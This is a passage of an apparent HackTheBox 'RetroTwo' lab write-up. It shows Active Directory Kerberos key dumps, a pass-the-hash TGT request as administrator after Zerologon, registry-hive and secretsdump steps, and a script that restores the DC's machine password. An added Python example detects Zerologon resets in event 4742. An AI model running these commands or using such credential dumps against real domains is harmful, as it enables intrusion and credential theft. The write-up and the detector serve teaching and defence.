Charles.Singh:des-cbc-md5:9125dcd6d3ad4fb6
Sam.Humphreys:aes256-cts-hmac-sha1-96:878ea36ddce6a9e5b050021e757669ff94b8b3367bcb9461dc83cdbcc1342b77
Sam.Humphreys:aes128-cts-hmac-sha1-96:102e420c74d34cda602282342c555b72
Sam.Humphreys:des-cbc-md5:5b5bc1a8683816c4
Margaret.Austin:aes256-cts-hmac-sha1-96:500b6f66a68c384b76ee63fb2d309278638c4eaa2903a7555b7f0a63ed2da30e
Margaret.Austin:aes128-cts-hmac-sha1-96:2bb2066bea0481bf7c9fae65a908bb64
Margaret.Austin:des-cbc-md5:077f91679bcb6dda
Caroline.James:aes256-cts-hmac-sha1-96:0ddabfe9574396df083878375b0e7100c4466698a1d0fa812a07b0bc17f44583
Caroline.James:aes128-cts-hmac-sha1-96:574766e01691af43749a8c0cc566af0f
Caroline.James:des-cbc-md5:29574998cd13f813
Lynda.Giles:aes256-cts-hmac-sha1-96:dc9ca6bdfd27960e9c5700864e0fec0a388f903747d79c61d773cc6e24ea2253
Lynda.Giles:aes128-cts-hmac-sha1-96:c2eaf2f31cb78d18ac51c1c8b0cd496d
Lynda.Giles:des-cbc-md5:62b9082f6e1ab92a
Emily.Price:aes256-cts-hmac-sha1-96:37d0c3e846f44b0c0afe005b178c1e2689ab8cf227c60345e4d83af3bedcd908
Emily.Price:aes128-cts-hmac-sha1-96:87331a1b619dc0b817a00bd7882973b3
Emily.Price:des-cbc-md5:d592c7dce0386489
Lynne.Dennis:aes256-cts-hmac-sha1-96:ec46f167dac2f0763fa4891b4ec7204e8b791b6e757b88f13eaf0a3069d91520
Lynne.Dennis:aes128-cts-hmac-sha1-96:a6de42302e21936f728c6340cc3924b4
Lynne.Dennis:des-cbc-md5:2337fe088083d561
Alexandra.Black:aes256-cts-hmac-sha1-96:63e7bcd8c3827fafac984927c8ee7a410644603b87df03a73d93a5d83d351199
Alexandra.Black:aes128-cts-hmac-sha1-96:f7f77113ff7a8e070f8d961a973afa80
Alexandra.Black:des-cbc-md5:70dcdcef4a584c67
Alex.Scott:aes256-cts-hmac-sha1-96:56e28035bf0e773b08eac63f2ded3b77150f4662335fecfe0d167439954c3c6c
Alex.Scott:aes128-cts-hmac-sha1-96:1743a9bfda5a6d4937e10833aa94261a
Alex.Scott:des-cbc-md5:c47a9e6475452f7c
Mandy.Davies:aes256-cts-hmac-sha1-96:f9ab0b0127d819088c6e20f2a22b62e658e65413634a982e7a03029860b5fbbb
Mandy.Davies:aes128-cts-hmac-sha1-96:775c402ad1b82a01d00d24cdce2f0cff
Mandy.Davies:des-cbc-md5:0dcb62cd49a4070b
Marilyn.Whitehouse:aes256-cts-hmac-sha1-96:070d0ec84b01cee1f4e6f7fde70978e38dd06e9718d29165f7b34687f2bfc57d
Marilyn.Whitehouse:aes128-cts-hmac-sha1-96:983446f761745cac59cfdf6533be1e62
Marilyn.Whitehouse:des-cbc-md5:b34fad80d6583d52
Lindsey.Harrison:aes256-cts-hmac-sha1-96:df8a640121c7931e4b1e24a903831bbdb2ceca342bc32df0d642be5ad59aebaa
Lindsey.Harrison:aes128-cts-hmac-sha1-96:9c0600e456143cb3a958434295e230c5
Lindsey.Harrison:des-cbc-md5:df4afde6a83d586d
Sally.Davey:aes256-cts-hmac-sha1-96:ad994860516e89a93515d9934fbc92ae0e18ac10a4179ce0b5e856d21239c07d
Sally.Davey:aes128-cts-hmac-sha1-96:1bd25ea0251be749c0b9ff10c0443728
Sally.Davey:des-cbc-md5:8940a2cde9fb45f1
retro2.vl\inventory:aes256-cts-hmac-sha1-96:251d2610ccb122fbefecbc0bad2a0f1ecffe39e48734d40fc31f9d6c32d9c3a6
retro2.vl\inventory:aes128-cts-hmac-sha1-96:6a4787b610d341b0d99758c8dd80a405
retro2.vl\inventory:des-cbc-md5:ad08041f6b0861a7
retro2.vl\ldapreader:aes256-cts-hmac-sha1-96:1f38605e159b9f10ba465530aa4ea2d9fd5429b3bf348fa8559b5acc647c0b32
retro2.vl\ldapreader:aes128-cts-hmac-sha1-96:000256e0522cc3cd2f52c6bfe1698368
retro2.vl\ldapreader:des-cbc-md5:8908762379fdfdae
BLN01$:aes256-cts-hmac-sha1-96:ffd22246332c76f0831bbae3acbcf7d9160e780f77ecbf6322ec536b8744a280
BLN01$:aes128-cts-hmac-sha1-96:00489881457ca7f5ba4dac2e1395fd44
BLN01$:des-cbc-md5:0886138c15a70157
ADMWS01$:aes256-cts-hmac-sha1-96:0dc5aa7e0eb1459d1213ee8a7f0646bd0088e34cc534ccdb317c7b7c39a7ff91
ADMWS01$:aes128-cts-hmac-sha1-96:7140b1ffde0959ef2816055600d62036
ADMWS01$:des-cbc-md5:2a1af4625b206798
FS01$:aes256-cts-hmac-sha1-96:c2d3478014ac16cda2a093ffa710f57939ea47c022aa0bd4cec840b2fc313b42
FS01$:aes128-cts-hmac-sha1-96:260e51b22e8694ed4c8d229bb3f18aeb
FS01$:des-cbc-md5:85df2686e95bdf92
FS02$:aes256-cts-hmac-sha1-96:fcceafa1335a9e262a1e4532d516011d4e8b80ae7f35fb35714a2a6410db18bc
FS02$:aes128-cts-hmac-sha1-96:5f2c27f494ab454d875057c909790e3e
FS02$:des-cbc-md5:252afd385b04b0bf
[*] Cleaning up...

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# nxc smb BLN01.retro2.vl -u administrator -H c06552bdb50ada21a7c74536c231b848  --generate-tgt administrator
SMB         10.129.34.62    445    BLN01            [*] Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (name:BLN01) (domain:retro2.vl) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         10.129.34.62    445    BLN01            [+] retro2.vl\administrator:c06552bdb50ada21a7c74536c231b848 (Pwn3d!)
SMB         10.129.34.62    445    BLN01            [+] TGT saved to: administrator.ccache
SMB         10.129.34.62    445    BLN01            [+] Run the following command to use the TGT: export KRB5CCNAME=administrator.ccache
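What the password reset above leaves in the DC's Security log is a reliable detection. The triage below is an added example, not part of the original write-up: it scans 4742 ("A computer account was changed") records exported as JSON and raises the Zerologon pattern, the DC's own machine account having its password set by ANONYMOUS LOGON (SID S-1-5-7) over a null Netlogon session. Field names follow the event's EventData members; hostnames are the box's, while SIDs, timestamps and the records themselves are constructed.

```python
"""Flag Zerologon-style machine account password resets in Security event 4742.

Added example, not part of the original write-up. Records are constructed;
hostnames come from the box, SIDs and timestamps are made up.
"""
import json

ANONYMOUS_LOGON_SID = "S-1-5-7"
DC_ACCOUNTS = {"BLN01$"}   # assumed inventory of domain controller accounts

# Constructed sample export of Security-log records.
SAMPLE_LOG = json.dumps([
    {   # routine machine password rotation: the account changes itself
        "EventID": 4742, "TimeCreated": "2025-10-25T16:05:41Z",
        "EventData": {"SubjectUserSid": "S-1-5-21-111-222-333-1001", "SubjectUserName": "BLN01$",
                      "SubjectDomainName": "RETRO2", "TargetUserName": "BLN01$",
                      "TargetDomainName": "RETRO2", "PasswordLastSet": "10/25/2025 4:05:41 PM"}},
    {   # the section 1.6 step: one workstation account resets another's password
        "EventID": 4742, "TimeCreated": "2025-10-26T15:10:02Z",
        "EventData": {"SubjectUserSid": "S-1-5-21-111-222-333-1131", "SubjectUserName": "FS01$",
                      "SubjectDomainName": "RETRO2", "TargetUserName": "ADMWS01$",
                      "TargetDomainName": "RETRO2", "PasswordLastSet": "10/26/2025 3:10:02 PM"}},
    {   # Zerologon pattern: anonymous caller sets the DC's machine password
        "EventID": 4742, "TimeCreated": "2025-10-26T16:41:12Z",
        "EventData": {"SubjectUserSid": "S-1-5-7", "SubjectUserName": "ANONYMOUS LOGON",
                      "SubjectDomainName": "NT AUTHORITY", "TargetUserName": "BLN01$",
                      "TargetDomainName": "RETRO2", "PasswordLastSet": "10/26/2025 4:41:12 PM"}},
    {   # unrelated event type, ignored
        "EventID": 4624, "TimeCreated": "2025-10-26T16:41:13Z", "EventData": {}},
])


def classify(ev: dict):
    """Return (severity, reason) for a suspicious 4742, or None if benign."""
    if ev.get("EventID") != 4742:
        return None
    d = ev["EventData"]
    target = d["TargetUserName"]
    # 4742 reports "-" in PasswordLastSet when the password was not touched
    if not target.endswith("$") or d.get("PasswordLastSet", "-") == "-":
        return None
    if d["SubjectUserSid"] == ANONYMOUS_LOGON_SID:
        return "high", "machine account password set over an unauthenticated session"
    if d["SubjectUserName"] == target:
        return None                       # self-rotation is routine
    if target in DC_ACCOUNTS:
        return "medium", "domain controller account password set by another principal"
    return "low", "machine account password set by another principal"


def triage(log_json: str) -> list[dict]:
    """Scan an exported log and return the suspicious password resets in order."""
    findings = []
    for ev in json.loads(log_json):
        hit = classify(ev)
        if hit:
            severity, reason = hit
            findings.append({
                "time": ev["TimeCreated"],
                "target": ev["EventData"]["TargetUserName"],
                "subject": ev["EventData"]["SubjectUserName"],
                "severity": severity,
                "reason": reason,
            })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f"{f['time']} {f['severity']:<6} {f['subject']} -> {f['target']}: {f['reason']}")
```

A hit on the DC account is also the cue to restore the machine password as section 3 does, since the DC's secure channel stays broken until then.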

3. Beyond Root (restoring the DC)

Zerologon clears the DC's machine account password, which can be restored as follows.
First log in with wmiexec and save the registry hives:

reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
reg save HKLM\SECURITY security.save
lget system.save
lget sam.save
lget security.save
del /f system.save
del /f sam.save
del /f security.save

Then run secretsdump against the saved hives to recover the original machine account hash:

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# secretsdump.py -sam sam.save -system system.save -security security.save LOCAL
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0x2bafc8cdbfbf9f6255da170cc977275e
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:6e70d74e5d3c6f1cfd30048e53c398dd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
$MACHINE.ACC:plain_password_hex:7cfe9e063c0f672319037c775682a08e24a6530b67b898e0d09a0d7fdb73046519e3b89c188a79f3fd17c812212e378725f09b3d9689e370759656b37c621a85bba9508e53007a03af337ed90be0cf7f19b26e047b0a1300d6836b9355806c89d3505a9698d80835174e2e5ecaaf33ec9263ea0760171522662d0760f7134ff743eeb932cbb0734240468e98a34a64eeac9833b58fe83d51562f558215b13ae8a754e0cb654f67a665e064ca41e6daa33bcc4dc87e0505116d5897a875557add1b78032f13bb332eee2dd23c37e6ade836cb5edf2a445943f3f7ab2f902286623f6ba1f5c4f6c8f236cd2d97362da53a
>>>> $MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:53ca4f552054a60df7b6eb3816c8242f
[*] DPAPI_SYSTEM
dpapi_machinekey:0x1f7e58016fd02f37fe1cfa38018e9e4092af070d
dpapi_userkey:0x86ad0f2f90872239d321ba068f3ef196094eee17
[*] NL$KM
 0000   C4 2C C3 F9 BB 4F AE E2  08 E3 8E D8 4A DB A8 E6   .,...O......J...
 0010   CC FB 15 71 EB 2D 85 DF  79 BA 08 92 5B E9 95 AC   ...q.-..y...[...
 0020   7A 4E 32 DB 94 17 55 39  C5 4B 9A C7 03 19 9B 3E   zN2...U9.K.....>
 0030   D8 AA 65 AD DE C3 9A E2  9B 8E DC E4 98 D6 5A 4A   ..e...........ZJ
NL$KM:c42cc3f9bb4faee208e38ed84adba8e6ccfb1571eb2d85df79ba08925be995ac7a4e32db94175539c54b9ac703199b3ed8aa65addec39ae29b8edce498d65a4a
[*] Cleaning up...

Reinstall the original hash (this takes a little while):

┌──(root㉿kali)-[~/Desktop/htb/RetroTwo/zerologon]
└─# python reinstall_original_pw.py BLN01 10.129.34.62 53ca4f552054a60df7b6eb3816c8242f
Performing authentication attempts...
============================================================================
NetrServerAuthenticate3Response
ServerCredential:
    Data:                            b'W\x8c\xf9]63)|'
NegotiateFlags:                  556793855
AccountRid:                      1001
ErrorCode:                       0


server challenge b'W\x8b\x07\x93>g\x9fF'
session key b'\x8c-\xa9\xe4\x98}\x048K\xd0\x01P^\xb0\xe5p'
NetrServerPasswordSetResponse
ReturnAuthenticator:
    Credential:
        Data:                            b'\x01\xd9\xc5\xb2\x9dyA\xa9'
    Timestamp:                       0
ErrorCode:                       0



Success! DC machine account should be restored to it's original value. You might want to secretsdump again to check.